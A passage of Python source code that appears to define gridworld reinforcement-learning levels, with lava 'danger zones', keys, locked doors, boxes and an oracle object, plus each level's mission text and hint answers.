rivers += [(h, j) for j in range(2, width - 2, 2)]
self.np_random.shuffle(rivers)
rivers = rivers[:self.num_crossings] # sample random rivers
rivers_v = sorted([pos for direction, pos in rivers if direction is v])
rivers_h = sorted([pos for direction, pos in rivers if direction is h])
obstacle_pos = itt.chain(
itt.product(range(1, width - 1), rivers_h),
itt.product(rivers_v, range(1, height - 1)),
)
colored_tiles = [set(), set()]
for i, j in obstacle_pos:
color_idx = self.np_random.randint(0, 2)
self.grid.set(i, j, Lava(self.lava_colors[color_idx]))
colored_tiles[color_idx].add((i, j))
path = [h] * len(rivers_v) + [v] * len(rivers_h)
self.np_random.shuffle(path)
# Create openings
limits_v = [0] + rivers_v + [height - 1]
limits_h = [0] + rivers_h + [width - 1]
room_i, room_j = 0, 0
openings = set()
for direction in path:
if direction is h:
i = limits_v[room_i + 1]
j = self.np_random.choice(
range(limits_h[room_j] + 1, limits_h[room_j + 1]))
room_i += 1
elif direction is v:
i = self.np_random.choice(
range(limits_v[room_i] + 1, limits_v[room_i + 1]))
j = limits_h[room_j + 1]
room_j += 1
else:
assert False
self.grid.set(i, j, Lava(self.lava_colors[self.target_idx]))
openings.add((i, j))
if (i, j) in colored_tiles[1 - self.target_idx]:
a, b = None, None
while colored_tiles[self.target_idx]:
a, b = colored_tiles[self.target_idx].pop()
if (a, b) not in openings:
break
if not colored_tiles[self.target_idx]:
a, b = None, None
break
if a is not None:
self.grid.set(a, b, Lava(self.lava_colors[1 - self.target_idx]))
#self.grid.set(i, j, None)
self.instrs = GoToGoalInstr()
self.put_obj(Goal('green'), *self.goal_pos)
if self.call:
self.grid.set(2, 1, None)
self.agent_pos = (2, 1)
else:
self.grid.set(1, 1, None)
self.grid.set(2, 1, None)
self.grid.set(3, 1, None)
self.agent_pos = (1, 1)
self.oracle_pos = (3, 1)
self.grid.set(*self.oracle_pos, Oracle(color='red'))
self.agent_dir = 1
self.useful_answers = ['danger zone is {}'.format(self.lava_colors[1 - self.target_idx])]
class Level_DangerBalancedDiverseMove(Level_DangerBalancedDiverse):
def __init__(self, seed=None, room_size=7):
super().__init__(seed=seed, room_size=room_size, call=False)
class Level_DangerBalancedDiverseRS9(Level_DangerBalancedDiverse):
def __init__(self, seed=None, room_size=9):
super().__init__(seed=seed, room_size=room_size)
class Level_OpenDoorMultiKeys(RoomGridLevel):
def __init__(self, seed=None):
room_size = 7
super().__init__(
num_rows=1,
num_cols=2,
room_size=room_size,
seed=seed
)
self.real_key_color = None
def gen_mission(self):
#colors = self._rand_subset(COLOR_NAMES, 2)
colors = COLOR_NAMES[0:3]
n_keys = 3
# Add a door of color A connecting left and middle room
locked_door_id = self._rand_int(0, n_keys)
self.locked_door, _ = add_id_door(self, 0, 0, id=locked_door_id, door_idx=0, color=colors[0], locked=True)
for i in range(n_keys):
obj, _ = add_id_object(self, 0, 0, id=i, kind="key", color=colors[i])
if i == locked_door_id:
self.real_key_color = colors[i]
self.place_agent(0, 0)
self.instrs = OpenInstr(ObjDesc(self.locked_door.type, color=self.locked_door.color))
self.useful_answers = ['{} key to {} door'.format(self.real_key_color, self.locked_door.color)]
class Level_DangerBalancedDiverseNeg(Level_DangerBalancedDiverse):
def __init__(self, seed=None):
super().__init__(seed=seed, failure_neg=True)
#### Two Compositional
class Level_DangerOpenDoor(RoomGridLevel):
def __init__(self, seed=None, room_size=7, call=True, failure_neg=False, anti_danger=True, n_rivers=3, open_door_bonus=True):
self.lava_colors = ['yellow', 'blue']
self.n_target = 2
self.goal_pos = (room_size * 2 - 3, room_size - 2)
self.agent_start_pos = (2, 1)
self.call = call
self.failure_neg = failure_neg
self.anti_danger = anti_danger
self.max_n_rivers = n_rivers
self.open_door_bonus = open_door_bonus
super().__init__(
num_rows=1,
num_cols=2,
room_size=room_size,
seed=seed,
failure_neg=failure_neg
)
def gen_mission(self):
self.target_idx = self.np_random.randint(0, self.n_target)
self.room_grid[0][0].door_pos[0] = (6, 1)
self.room_grid[0][1].door_pos[2] = (6, 1)
# Place obstacles (lava or walls)
if self.anti_danger:
self.num_crossings = self.np_random.randint(1, self.max_n_rivers + 1)
add_danger_tiles_anti_diag(self)
self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
add_danger_tiles_diag(self)
self.instrs = GoToGoalInstr(door=self.open_door_bonus)
#self.put_obj(Goal('green'), *self.goal_pos)
if self.call:
self.grid.set(2, 1, None)
self.agent_pos = (1, self.room_size - 2)
else:
self.grid.set(1, 1, None)
self.grid.set(2, 1, None)
self.grid.set(3, 1, None)
self.agent_pos = (1, 1)
self.oracle_pos = (3, 1)
self.grid.set(*self.oracle_pos, Oracle(color='red'))
self.agent_dir = 1
# Open Door Part
colors = COLOR_NAMES[0:3]
n_keys = 2
# Add a door of color A connecting left and middle room
locked_door_id = self._rand_int(0, n_keys)
self.locked_door, _ = add_id_door(self, 0, 0, id=locked_door_id, door_idx=0, color=colors[0], locked=True)
self.target_doors = [self.locked_door]
for i in range(n_keys):
obj = KeyWID(i, colors[i])
if i == 0:
self.grid.set(self.room_size - 3, 1, obj)
elif i == 1:
self.grid.set(self.room_size - 2, 2, obj)
if i == locked_door_id:
self.real_key_color = colors[i]
self.put_obj(Goal('green'), *self.goal_pos)
self.useful_answers = ['danger zone is {}, {} key to {} door'.format(self.lava_colors[1 - self.target_idx], self.real_key_color, self.locked_door.color)]
class Level_DangerOpenDoorV2(Level_DangerOpenDoor):
def __init__(self, seed=None, room_size=7):
super().__init__(seed=seed, room_size=room_size, open_door_bonus=False)
class Level_OpenDoorObjInBox(RoomGridLevel):
def __init__(self, seed=None, n_boxes=2, failure_neg=False):
room_size = 7
self.n_boxes = n_boxes
self.names = ['jack', 'mary']
super().__init__(
num_rows=1,
num_cols=2,
room_size=room_size,
seed=seed,
failure_neg=failure_neg
)
self.real_key_color = None
def gen_mission(self):
colors = COLOR_NAMES[0:3]
n_keys = 2
# Add a door of color A connecting left and middle room
locked_door_id = self._rand_int(0, n_keys)
self.locked_door, _ = add_id_door(self, 0, 0, id=locked_door_id, door_idx=0, color=colors[0], locked=True)
self.target_doors = [self.locked_door]
for i in range(n_keys):
obj, _ = add_id_object(self, 0, 0, id=i, kind="key", color=colors[i])
if i == locked_door_id:
self.real_key_color = colors[i]
# ObjInBox Part
colors = COLOR_NAMES[:self.n_boxes]
shuffled_colors = copy.deepcopy(colors)
self.np_random.shuffle(shuffled_colors)
shuffled_colors2 = copy.deepcopy(colors)
self.np_random.shuffle(shuffled_colors2)
target_id = self._rand_int(0, self.n_boxes)
toy_owner = self._rand_int(0, 2)
box_owner = 1 - toy_owner
for i in range(self.n_boxes):
ball = Ball(color=shuffled_colors[i])
box = Box(color=shuffled_colors2[i], contains=ball)
self.place_in_room(1, 0, box)
if i == target_id:
self.box_owner = self.names[box_owner]
self.target_box = box
self.instrs = FindOrFailInstr(ObjDesc(ball.type, ball.color), surface='find the key to the door, and find ' + self.names[toy_owner] + ' toy', door=True)
self.useful_answers = ['{} toy is {} ball'.format(self.names[toy_owner], ball.color),
'{} ball in {} suitcase'.format(ball.color, self.names[box_owner]),
'{} suitcase {} box'.format(self.names[box_owner], self.target_box.color),
'{} box in room1'.format(self.target_box.color)]
self.place_agent(0, 0)
self.useful_answers.append('{} key to the door'.format(self.real_key_color))
class Level_OpenDoorGoToFavorite(RoomGridLevel):
"""
Go to an object, the object may be in another room. Many distractors.
"""
def __init__(
self,
room_size=5,
num_rows=3,
num_cols=3,
num_dists=3,
doors_open=False,
seed=None,
all_doors=True,
num_colors=2,
oracle_mode='call'
):
self.num_dists = num_dists
self.doors_open = doors_open
self.num_rows = num_rows
self.num_cols = num_cols
self.all_doors = all_doors
self.num_colors = num_colors
self.names = ['jack', 'mary']
self.others_fav = None
self.oracle_mode = oracle_mode
super().__init__(
num_rows=num_rows,
num_cols=num_cols,
room_size=room_size,
seed=seed
)
def gen_mission(self):
agent_room_i = self._rand_int(0, self.num_cols)
agent_room_j = self._rand_int(0, self.num_rows)
self.place_agent(agent_room_i, agent_room_j)
locked = False
if self.all_doors:
add_id_door(self, 0, 0, id=100, door_idx=0, locked=locked)
add_id_door(self, 0, 1, id=100, door_idx=0, locked=locked)
add_id_door(self, 1, 1, id=100, door_idx=0, locked=locked)
add_id_door(self, 0, 2, id=100, door_idx=0, locked=locked)
add_id_door(self, 1, 2, id=100, door_idx=0, locked=locked)
add_id_door(self, 0, 0, id=100, door_idx=1, locked=locked)
add_id_door(self, 1, 0, id=100, door_idx=1, locked=locked)
add_id_door(self, 2, 0, id=100, door_idx=1, locked=locked)
add_id_door(self, 0, 1, id=100, door_idx=1, locked=locked)
add_id_door(self, 1, 1, id=100, door_idx=1, locked=locked)
add_id_door(self, 2, 1, id=100, door_idx=1, locked=locked)
else:
self.connect_all()
objs = self.add_distractors(num_distractors=self.num_dists, all_unique=True, num_colors=self.num_colors)
obj = self._rand_elem(objs)
self.check_objs_reachable()
random.shuffle(self.names)
self.instrs = FavoriteInstr(ObjDesc(obj.type, obj.color), name=self.names[0], surface='find the key to the door, go to {} toy'.format(self.names[0]), open_door=True)
room_id = (obj.cur_pos[0] // self.room_size) + (obj.cur_pos[1] // self.room_size) * self.num_cols
target_obj = obj
self.others_fav = self._rand_elem(objs)
if self.doors_open:
self.open_all_doors()
if self.oracle_mode == 'single_move':
oracle = Oracle(color='red')
self.place_in_room(agent_room_i, agent_room_j, oracle)
self.oracle = oracle
# OpenDoor
colors = COLOR_NAMES[0:3]
n_keys = 2
# Add a door of color A connecting left and middle room
locked_door_id = self._rand_int(0, n_keys)
#self.locked_door, _ = self.add_id_door(0, 0, id=locked_door_id, door_idx=0, color=colors[0], locked=True)
for i in range(n_keys):
obj, _ = add_id_object(self, agent_room_i, agent_room_j, id=i, kind="key", color=colors[i])
if i == locked_door_id:
self.real_key_color = colors[i]
self.target_doors = []
room_i, room_j = room_id // 3, room_id % 3
for door in self.room_grid[room_i][room_j].doors:
if door is not None:
door.is_locked = True
door.id = locked_door_id
self.target_doors.append(door)
self.useful_answers = ['{} toy is {} {}'.format(self.names[0], target_obj.color, target_obj.type),
'{} {} in room{}'.format(target_obj.color, target_obj.type, room_id),
'{} key to the door'.format(self.real_key_color)
]
def add_distractors(self, i=None, j=None, num_distractors=10, all_unique=True, num_colors=2):
"""
Add random objects that can potentially distract/confuse the agent.
"""
# Collect a list of existing objects
objs = []
for row in self.room_grid:
for room in row:
for obj in room.objs:
objs.append((obj.type, obj.color))
# List of distractors added
dists = []
while len(dists) < num_distractors:
color = self._rand_elem(COLOR_NAMES[:num_colors])
type = self._rand_elem(['ball', 'box'])
obj = (type, color)
if all_unique and obj in objs:
continue
# Add the object to a random room if no room specified
room_i = i
room_j = j
if room_i == None:
room_i = self._rand_int(0, self.num_cols)
if room_j == None:
room_j = self._rand_int(0, self.num_rows)
dist, pos = self.add_object(room_i, room_j, *obj)
objs.append(obj)
dists.append(dist)
return dists
class Level_GoToFavoriteObjInBox(RoomGridLevel):
"""
Go to an object, the object may be in another room. Many distractors.
"""
def __init__(
self,
room_size=5,
num_rows=3,
num_cols=3,
num_dists=3,
doors_open=True,
seed=None,
all_doors=True,
num_colors=2,
oracle_mode='call',
failure_neg=False
):
self.num_dists = num_dists
self.doors_open = doors_open
self.num_rows = num_rows
self.num_cols = num_cols
self.all_doors = all_doors
self.num_colors = num_colors
self.names = ['jack', 'mary']
self.others_fav = None
self.oracle_mode = oracle_mode
self.n_boxes = 2
super().__init__(
num_rows=num_rows,
num_cols=num_cols,
room_size=room_size,
seed=seed,
failure_neg=failure_neg
)
def gen_mission(self):
agent_room_i = self._rand_int(0, self.num_cols)
agent_room_j = self._rand_int(0, self.num_rows)
self.place_agent(agent_room_i, agent_room_j)
locked = False
if self.all_doors:
self.add_door(0, 0, door_idx=0, locked=locked)
self.add_door(1, 0, door_idx=0, locked=locked)
self.add_door(0, 1, door_idx=0, locked=locked)
self.add_door(1, 1, door_idx=0, locked=locked)
self.add_door(0, 2, door_idx=0, locked=locked)
self.add_door(1, 2, door_idx=0, locked=locked)
self.add_door(0, 0, door_idx=1, locked=locked)
self.add_door(1, 0, door_idx=1, locked=locked)
self.add_door(2, 0, door_idx=1, locked=locked)
self.add_door(0, 1, door_idx=1, locked=locked)
self.add_door(1, 1, door_idx=1, locked=locked)
self.add_door(2, 1, door_idx=1, locked=locked)
else:
self.connect_all()
if self.doors_open:
self.open_all_doors()
if self.oracle_mode == 'single_move':
oracle = Oracle(color='red')
self.place_in_room(agent_room_i, agent_room_j, oracle)
self.oracle = oracle
# ObjInBox
colors = COLOR_NAMES[:self.n_boxes]
shuffled_colors = copy.deepcopy(colors)
self.np_random.shuffle(shuffled_colors)
shuffled_colors2 = copy.deepcopy(colors)
self.np_random.shuffle(shuffled_colors2)
target_id = self._rand_int(0, self.n_boxes)
toy_owner = self._rand_int(0, 2)
box_owner = 1 - toy_owner
for i in range(self.n_boxes):
ball = Ball(color=shuffled_colors[i])
box = Box(color=shuffled_colors2[i], contains=ball)
self.place_in_room(self.np_random.randint(0, 3), self.np_random.randint(0, 3), box)
if i == target_id:
self.box_owner = self.names[box_owner]
self.target_box = box
self.instrs = FindOrFailInstr(ObjDesc(ball.type, ball.color), surface='find ' + self.names[toy_owner] + ' toy')
self.useful_answers = ['{} toy is {} ball'.format(self.names[toy_owner], ball.color),
'{} ball in {} suitcase'.format(ball.color, self.names[box_owner]),
'{} suitcase is {} box'.format(self.names[box_owner], self.target_box.color)]
def add_distractors(self, i=None, j=None, num_distractors=10, all_unique=True, num_colors=2):
"""
Add random objects that can potentially distract/confuse the agent.
"""
# Collect a list of existing objects
objs = []
for row in self.room_grid:
for room in row:
for obj in room.objs:
objs.append((obj.type, obj.color))
# List of distractors added
dists = []
while len(dists) < num_distractors:
color = self._rand_elem(COLOR_NAMES[:num_colors])
type = self._rand_elem(['ball', 'box'])
obj = (type, color)
if all_unique and obj in objs:
continue
# Add the object to a random room if no room specified
room_i = i
room_j = j
if room_i == None:
room_i = self._rand_int(0, self.num_cols)
if room_j == None:
room_j = self._rand_int(0, self.num_rows)
dist, pos = self.add_object(room_i, room_j, *obj)
objs.append(obj)
dists.append(dist)
return dists
class Level_DangerObjInBox(RoomGridLevel):
def __init__(self, seed=None, room_size=7, call=True, failure_neg=False):
self.lava_colors = ['yellow', 'blue']
self.n_target = 2
self.goal_pos = (room_size - 2, room_size - 2)
self.agent_start_pos = (2, 1)
self.call = call
self.n_boxes = 2
self.names = ['jack', 'mary']
super().__init__(
num_rows=1,
num_cols=1,
room_size=room_size,
seed=seed,
failure_neg=failure_neg
)
def gen_mission(self):
self.target_idx = self.np_random.randint(0, self.n_target)
# Place obstacles (lava or walls)
self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
add_danger_tiles_anti_diag(self)
if self.call:
self.grid.set(2, 1, None)
self.agent_pos = (2, 1)
else:
self.grid.set(1, 1, None)
self.grid.set(2, 1, None)
self.grid.set(3, 1, None)
self.agent_pos = (1, 1)
self.oracle_pos = (3, 1)
self.grid.set(*self.oracle_pos, Oracle(color='red'))
self.agent_dir = 1
colors = COLOR_NAMES[:self.n_boxes]
shuffled_colors = copy.deepcopy(colors)
self.np_random.shuffle(shuffled_colors)
shuffled_colors2 = copy.deepcopy(colors)
self.np_random.shuffle(shuffled_colors2)
target_id = self._rand_int(0, self.n_boxes)
toy_owner = self._rand_int(0, 2)
box_owner = 1 - toy_owner
for i in range(self.n_boxes):
ball = Ball(color=shuffled_colors[i])
box = Box(color=shuffled_colors2[i], contains=ball)
if i == 0:
self.grid.set(1, self.room_size - 2, box)
else:
self.grid.set(self.room_size - 2, self.room_size - 2, box)
self.get_room(0, 0).objs.append(box)
if i == target_id:
self.box_owner = self.names[box_owner]
self.target_box = box
self.instrs = FindOrFailInstr(ObjDesc(ball.type, ball.color), surface='Avoid danger zone, find ' + self.names[toy_owner] + ' toy',
danger=True)
self.useful_answers = ['{} toy is {} ball'.format(self.names[toy_owner], ball.color),
'{} ball in {} suitcase'.format(ball.color, self.names[box_owner]),
'{} suitcase is {} box'.format(self.names[box_owner], self.target_box.color),
'danger zone is {}'.format(self.lava_colors[1 - self.target_idx])]
#print(self.useful_answers)
class Level_DangerGoToFav(RoomGridLevel):
def __init__(self, seed=None, room_size=7, call=True, failure_neg=False, anti_danger=True, n_rivers=3):
self.lava_colors = ['yellow', 'blue']
self.n_target = 2
self.goal_pos = (room_size * 2 - 3, room_size - 2)
self.agent_start_pos = (2, 1)
self.call = call
self.names = ['jack', 'mary']
self.anti_danger = anti_danger
self.max_n_rivers = n_rivers
super().__init__(
num_rows=1,
num_cols=3,
room_size=room_size,
seed=seed,
failure_neg=failure_neg
)
def gen_mission(self):
self.target_idx = self.np_random.randint(0, self.n_target)
self.room_grid[0][0].door_pos[0] = (6, 1)
self.room_grid[0][1].door_pos[2] = (6, 1)
self.room_grid[0][1].door_pos[0] = (12, 5)
self.room_grid[0][2].door_pos[2] = (12, 5)
self.add_door(0, 0, door_idx=0, locked=False)
self.add_door(1, 0, door_idx=0, locked=False)
# Place obstacles (lava or walls)
if self.anti_danger:
self.num_crossings = self.np_random.randint(1, self.max_n_rivers + 1)
add_danger_tiles_anti_diag(self)
self.num_crossings = self.np_random.randint(1, self.max_n_rivers + 1)
add_danger_tiles_anti_diag(self, offset=12)
self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
add_danger_tiles_diag(self)
if self.call:
self.grid.set(2, 1, None)
self.agent_pos = (self.room_size, 1)
else:
self.grid.set(1, 1, None)
self.grid.set(2, 1, None)
self.grid.set(3, 1, None)
self.agent_pos = (1, 1)
self.oracle_pos = (3, 1)
self.grid.set(*self.oracle_pos, Oracle(color='red'))
self.agent_dir = 1
self.open_all_doors()
# GoToFav
self.num_dists = 2
objs = []
obj = create_rnd_obj(self)
place_obj(self, 1, self.room_size - 2, obj)
objs.append(obj)
obj = create_rnd_obj(self)
place_obj(self, (self.room_size - 1) * 3 - 1, 1, obj)
objs.append(obj)
target_obj = self._rand_elem(objs)
self.instrs = FavoriteInstr(ObjDesc(target_obj.type, target_obj.color), name=self.names[0], surface="avoid danger zone, go to {} toy".format(self.names[0]), danger=True)
room_id = (target_obj.cur_pos[0] // self.room_size) + (target_obj.cur_pos[1] // self.room_size) * self.num_cols
self.useful_answers = ['{} toy is {} {}'.format(self.names[0], target_obj.color, target_obj.type),
'{} {} in room{}'.format(target_obj.color, target_obj.type, room_id),
'danger zone is {}'.format(self.lava_colors[1 - self.target_idx])]
#print(self.useful_answers)
class Level_DangerGoToFavSymmetry(RoomGridLevel):
def __init__(self, seed=None, room_size=7, call=True, failure_neg=False, n_rivers=3):
self.lava_colors = ['yellow', 'blue']
self.n_target = 2
self.goal_pos = (room_size * 2 - 3, room_size - 2)
self.agent_start_pos = (2, 1)
self.call = call
self.names = ['jack', 'mary']
self.max_n_rivers = n_rivers
super().__init__(
num_rows=1,
num_cols=3,
room_size=room_size,
seed=seed,
failure_neg=failure_neg
)
def gen_mission(self):
self.target_idx = self.np_random.randint(0, self.n_target)
self.room_grid[0][0].door_pos[0] = (6, 1)
self.room_grid[0][1].door_pos[2] = (6, 1)
self.room_grid[0][1].door_pos[0] = (12, 1)
self.room_grid[0][2].door_pos[2] = (12, 1)
self.add_door(0, 0, door_idx=0, locked=False)
self.add_door(1, 0, door_idx=0, locked=False)
# Place obstacles (lava or walls)
self.num_crossings = self.np_random.randint(1, self.max_n_rivers + 1)
add_danger_tiles_anti_diag(self)
self.num_crossings = self.np_random.randint(1, 4)
add_danger_tiles_middle(self, offset=6)
self.num_crossings = self.np_random.randint(1, (self.max_n_rivers + 1))
add_danger_tiles_diag(self, offset=12)
if self.call:
self.grid.set(2, 1, None)
self.agent_pos = (self.room_size + 2, 1)
else:
self.grid.set(1, 1, None)
self.grid.set(2, 1, None)
self.grid.set(3, 1, None)
self.agent_pos = (1, 1)
self.oracle_pos = (3, 1)
self.grid.set(*self.oracle_pos, Oracle(color='red'))
self.agent_dir = 1
self.open_all_doors()
# GoToFav
self.num_dists = 2
objs = []
obj = create_rnd_obj(self)
place_obj(self, 1, self.room_size - 2, obj)
objs.append(obj)
obj = create_rnd_obj(self)
place_obj(self, (self.room_size - 1) * 3 - 1, self.room_size - 2, obj)
objs.append(obj)
target_obj = self._rand_elem(objs)
self.instrs = FavoriteInstr(ObjDesc(target_obj.type, target_obj.color), name=self.names[0], surface="avoid danger zone, go to {} toy".format(self.names[0]), danger=True)
room_id = (target_obj.cur_pos[0] // self.room_size) + (target_obj.cur_pos[1] // self.room_size) * self.num_cols
self.useful_answers = ['{} toy is {} {}'.format(self.names[0], target_obj.color, target_obj.type),
'{} {} in room{}'.format(target_obj.color, target_obj.type, room_id)]
class Level_DangerGoToFav2Room(RoomGridLevel):
def __init__(self, seed=None, room_size=7, call=True, failure_neg=False, anti_danger=True, n_rivers=3):
self.lava_colors = ['yellow', 'blue']
self.n_target = 2
self.goal_pos = (room_size * 2 - 3, room_size - 2)
self.agent_start_pos = (2, 1)
self.call = call
self.names = ['jack', 'mary']
self.anti_danger = anti_danger
self.max_n_rivers = n_rivers
super().__init__(
num_rows=1,
num_cols=2,
room_size=room_size,
seed=seed,
failure_neg=failure_neg
)
def gen_mission(self):
self.target_idx = self.np_random.randint(0, self.n_target)
self.room_grid[0][0].door_pos[0] = (6, 1)
self.room_grid[0][1].door_pos[2] = (6, 1)
self.add_door(0, 0, door_idx=0, locked=False)
# Place obstacles (lava or walls)
if self.anti_danger:
self.num_crossings = self.np_random.randint(1, self.max_n_rivers + 1)
add_danger_tiles_anti_diag(self)
self.num_crossings = self.np_random.randint(1, (self.max_n_rivers + 1))
add_danger_tiles_diag(self)
if self.call:
self.grid.set(2, 1, None)
self.agent_pos = (self.room_size - 1, 1)
else:
self.grid.set(1, 1, None)
self.grid.set(2, 1, None)
self.grid.set(3, 1, None)
self.agent_pos = (1, 1)
self.oracle_pos = (3, 1)
self.grid.set(*self.oracle_pos, Oracle(color='red'))
self.agent_dir = 1
self.open_all_doors()
# GoToFav
self.num_dists = 2
objs = []
obj = create_rnd_obj(self)
place_obj(self, 1, self.room_size - 2, obj)
objs.append(obj)
obj = create_rnd_obj(self)
place_obj(self, (self.room_size - 1) * 2 - 1, self.room_size - 2, obj)
objs.append(obj)
target_obj = self._rand_elem(objs)
self.instrs = FavoriteInstr(ObjDesc(target_obj.type, target_obj.color), name=self.names[0], surface="avoid danger zone, go to {} toy".format(self.names[0]), danger=True)
room_id = (target_obj.cur_pos[0] // self.room_size) + (target_obj.cur_pos[1] // self.room_size) * self.num_cols
self.useful_answers = ['{} toy is {} {}'.format(self.names[0], target_obj.color, target_obj.type),
'{} {} in room{}'.format(target_obj.color, target_obj.type, room_id),
'danger zone is {}'.format(self.lava_colors[1 - self.target_idx])
]
class Level_DangerOpenDoorNeg(Level_DangerOpenDoor):
def __init__(self, seed=None, room_size=7):
super().__init__(seed=seed, room_size=room_size, call=True, failure_neg=True)
class Level_DangerGoToFavNeg(Level_DangerGoToFav):
def __init__(self, seed=None, room_size=7):
super().__init__(seed=seed, room_size=room_size, call=True, failure_neg=True)
class Level_DangerObjInBoxNeg(Level_DangerObjInBox):
def __init__(self, seed=None, room_size=7):
super().__init__(seed=seed, room_size=room_size, call=True, failure_neg=True)
class Level_GoToFavoriteObjInBoxNeg(Level_GoToFavoriteObjInBox):
def __init__(self, seed=None):
super().__init__(seed=seed, failure_neg=True)
class Level_OpenDoorObjInBoxNeg(Level_OpenDoorObjInBox):
def __init__(self, seed=None):
super().__init__(seed=seed, failure_neg=True)
class Level_DangerGoToFavEasy(Level_DangerGoToFav):
def __init__(self, seed=None, room_size=7):
super().__init__(seed=seed, room_size=room_size, call=True, failure_neg=False, anti_danger=False)
class Level_DangerOpenDoorEasy(Level_DangerOpenDoor):
def __init__(self, seed=None, room_size=7):
super().__init__(seed=seed, room_size=room_size, call=True, failure_neg=False, anti_danger=False)
class Level_DangerOpenDoor1Cross(Level_DangerOpenDoor):
def __init__(self, seed=None, room_size=7):
super().__init__(seed=seed, room_size=room_size, call=True, failure_neg=False, anti_danger=True, n_rivers=1)
class Level_DangerOpenDoor2Cross(Level_DangerOpenDoor):
def __init__(self, seed=None, room_size=7):
super().__init__(seed=seed, room_size=room_size, call=True, failure_neg=False, anti_danger=True, n_rivers=2)
class Level_DangerGoToFav1Cross(Level_DangerGoToFav):
def __init__(self, seed=None, room_size=7):
super().__init__(seed=seed, room_size=room_size, call=True, failure_neg=False, anti_danger=True, n_rivers=1)
class Level_DangerGoToFav2Cross(Level_DangerGoToFav):
def __init__(self, seed=None, room_size=7):
super().__init__(seed=seed, room_size=room_size, call=True, failure_neg=False, anti_danger=True, n_rivers=2)
# Combine 3 tasks
class Level_DangerGoToFavOpenDoor(RoomGridLevel):
def __init__(self, seed=None, room_size=7, call=True):
self.lava_colors = ['yellow', 'blue']
self.n_target = 2
self.goal_pos = (room_size * 2 - 3, room_size - 2)
self.agent_start_pos = (2, 1)
self.call = call
self.names = ['jack', 'mary']
super().__init__(
num_rows=1,
num_cols=3,
room_size=room_size,
seed=seed
)
def gen_mission(self):
self.target_idx = self.np_random.randint(0, self.n_target)
self.room_grid[0][0].door_pos[0] = (6, 1)
self.room_grid[0][1].door_pos[2] = (6, 1)
self.room_grid[0][1].door_pos[0] = (12, 5)
self.room_grid[0][2].door_pos[2] = (12, 5)
#self.add_door(0, 0, door_idx=0, locked=False)
#self.add_door(1, 0, door_idx=0, locked=False)
# Place obstacles (lava or walls)
self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
add_danger_tiles_anti_diag(self)
self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
add_danger_tiles_diag(self)
self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
add_danger_tiles_anti_diag(self, offset=12)
if self.call:
self.grid.set(2, 1, None)
self.agent_pos = (self.room_size, 1)
else:
self.grid.set(1, 1, None)
self.grid.set(2, 1, None)
self.grid.set(3, 1, None)
self.agent_pos = (1, 1)
self.oracle_pos = (3, 1)
self.grid.set(*self.oracle_pos, Oracle(color='red'))
self.agent_dir = 1
# GoToFav
self.num_dists = 2
objs = []
obj = create_rnd_obj(self)
place_obj(self, 1, self.room_size - 2, obj)
objs.append(obj)
obj = create_rnd_obj(self)
place_obj(self, (self.room_size - 1) * 3 - 1, 1, obj)
objs.append(obj)
target_obj = self._rand_elem(objs)
# OpenDoor
colors = COLOR_NAMES[0:3]
self.np_random.shuffle(colors)
n_keys = 2
# Add a door of color A connecting left and middle room
locked_door_id = self._rand_int(0, n_keys)
self.locked_doors = []
self.locked_doors.append(add_id_door(self, 0, 0, id=0, door_idx=0, color=colors[0], locked=True)[0])
self.locked_doors.append(add_id_door(self, 1, 0, id=0, door_idx=0, color=colors[1], locked=True)[0])
agent_room_i, agent_room_j = 1, 0
self.np_random.shuffle(colors)
add_id_object_abs(self, self.room_size - 1 + 1, self.room_size - 2, id=0, kind='key', color=colors[0])
add_id_object_abs(self, 2 * (self.room_size - 1) - 1, self.room_size - 2, id=1, kind='key', color=colors[1])
self.real_key_color = colors[0]
self.instrs = FavoriteInstr(ObjDesc(target_obj.type, target_obj.color), name=self.names[0], surface="avoid danger zone, find the key to open the door, go to {} toy".format(self.names[0]), danger=True)
room_id = (target_obj.cur_pos[0] // self.room_size) + (target_obj.cur_pos[1] // self.room_size) * self.num_cols
self.useful_answers = ['{} toy is {} {}'.format(self.names[0], target_obj.color, target_obj.type),
'{} {} in room{}'.format(target_obj.color, target_obj.type, room_id),
'danger zone is {}'.format(self.lava_colors[1 - self.target_idx])
]
class Level_OpenDoorGoToFavoriteObjInBox(RoomGridLevel):
"""
Go to an object, the object may be in another room. Many distractors.
"""
def __init__(
self,
room_size=5,
num_rows=3,
num_cols=3,
num_dists=3,
doors_open=False,
seed=None,
all_doors=True,
num_colors=2,
oracle_mode='call'
):
self.num_dists = num_dists
self.doors_open = doors_open
self.num_rows = num_rows
self.num_cols = num_cols
self.all_doors = all_doors
self.num_colors = num_colors
self.names = ['jack', 'mary']
self.others_fav = None
self.oracle_mode = oracle_mode
super().__init__(
num_rows=num_rows,
num_cols=num_cols,
room_size=room_size,
seed=seed
)
def gen_mission(self):
agent_room_i = self._rand_int(0, self.num_cols)
agent_room_j = self._rand_int(0, self.num_rows)
self.place_agent(agent_room_i, agent_room_j)
locked = False
if self.all_doors:
add_id_door(self, 0, 0, id=100, door_idx=0, locked=locked)
add_id_door(self, 0, 1, id=100, door_idx=0, locked=locked)
add_id_door(self, 1, 1, id=100, door_idx=0, locked=locked)
add_id_door(self, 0, 2, id=100, door_idx=0, locked=locked)
add_id_door(self, 1, 2, id=100, door_idx=0, locked=locked)
add_id_door(self, 0, 0, id=100, door_idx=1, locked=locked)
add_id_door(self, 1, 0, id=100, door_idx=1, locked=locked)
add_id_door(self, 2, 0, id=100, door_idx=1, locked=locked)
add_id_door(self, 0, 1, id=100, door_idx=1, locked=locked)
add_id_door(self, 1, 1, id=100, door_idx=1, locked=locked)
add_id_door(self, 2, 1, id=100, door_idx=1, locked=locked)
else:
self.connect_all()
if self.doors_open:
self.open_all_doors()
if self.oracle_mode == 'single_move':
oracle = Oracle(color='red')
self.place_in_room(agent_room_i, agent_room_j, oracle)
self.oracle = oracle
# ObjInBox
self.n_boxes = 2
colors = COLOR_NAMES[:self.n_boxes]
shuffled_colors = copy.deepcopy(colors)
self.np_random.shuffle(shuffled_colors)
shuffled_colors2 = copy.deepcopy(colors)
self.np_random.shuffle(shuffled_colors2)
target_id = self._rand_int(0, self.n_boxes)
toy_owner = self._rand_int(0, 2)
box_owner = 1 - toy_owner
for i in range(self.n_boxes):
ball = Ball(color=shuffled_colors[i])
box = BoxOverLap(color=shuffled_colors2[i], contains=ball)
